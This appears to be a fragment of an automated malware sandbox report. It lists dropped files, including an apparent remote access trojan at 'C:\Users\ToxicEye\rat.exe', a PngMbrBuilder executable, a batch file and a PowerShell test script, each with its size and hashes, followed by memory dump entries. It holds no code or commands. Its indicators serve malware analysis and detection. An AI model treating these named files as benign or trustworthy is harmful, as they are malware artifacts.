87c5368dbd7c85f341edf8992d8b1c87984f9a3549a4802c6054da4e12a8674f10f56d03afc1a72b2cfc40895150d3b0f4d9d4c355c79cdf364ace35eb8ebf15

Download Submit
C:\Users\Admin\AppData\Local\Temp\PngMbrBuilder.exe

Filesize
269KB

MD5
889d7c6ef3c2a41b094efea12504829a

SHA1
bb1d80ae26938d024e501c4263690cb23c4cc027

SHA256
90897d1c60f45943a2971a3c255f36838b4775179c94c44b6eb2a90f7f44898f

SHA512
7e7f108d78c8d2d76696203439a3fbb8908d0525120ad8970ae1d1881323b0757ecd41b68de22d18733fc2b40fc019dd3884763ebc188cb721b51fe7a32d0edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dammryhl.gnw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA0E3.tmp.bat

Filesize
188B

MD5
eb32990c76f148015cea9fe9b3090f47

SHA1
1efcfa3a80745664d31ed644845610535f5adb19

SHA256
2fa0d69850fa83e7b51d3734ad1b86a45eee1f54329ca624c49b28a36b95b9aa

SHA512
496057c85ea2f3713a55cc0e3b9abdd4db787949a642573c83f89c8f433c688b99569aff2e185dccf2a14b39eb9e4edb13739229bde44412320b5140d8e533ec

Download Submit
C:\Users\ToxicEye\rat.exe

Filesize
119KB

MD5
47436ad8508cbdbede6535db163766bc

SHA1
c6c6f8eb7dac9f294da1547e30c320a7d316bf52

SHA256
43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0

SHA512
255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c

Download Submit
memory/2220-0-0x00007FF857523000-0x00007FF857525000-memory.dmp

Filesize
8KB

Download
memory/2220-1-0x0000021BF32C0000-0x0000021BF32E4000-memory.dmp

Filesize
144KB

Download
memory/2220-6-0x00007FF857520000-0x00007FF857FE1000-memory.dmp

Filesize
10.8MB

Download
memory/2220-2-0x00007FF857520000-0x00007FF857FE1000-memory.dmp

Filesize
10.8MB

Download
memory/2708-166-0x0000000000870000-0x00000000008BE000-memory.dmp

Filesize
312KB

Download
memory/2708-167-0x0000000002900000-0x0000000002906000-memory.dmp

Filesize
24KB

Download
memory/2708-168-0x000000001B830000-0x000000001B964000-memory.dmp

Filesize
1.2MB

Download
memory/2708-169-0x0000000002980000-0x0000000002986000-memory.dmp

Filesize
24KB

Download
memory/3728-100-0x0000018747F70000-0x0000018748132000-memory.dmp

Filesize
1.8MB

Download
memory/3728-95-0x000001872F330000-0x000001872F352000-memory.dmp

Filesize
136KB

Download
memory/4288-11-0x0000027A36F90000-0x0000027A3703A000-memory.dmp

Filesize
680KB

Download
memory/4288-12-0x0000027A37130000-0x0000027A371A6000-memory.dmp

Filesize
472KB

Download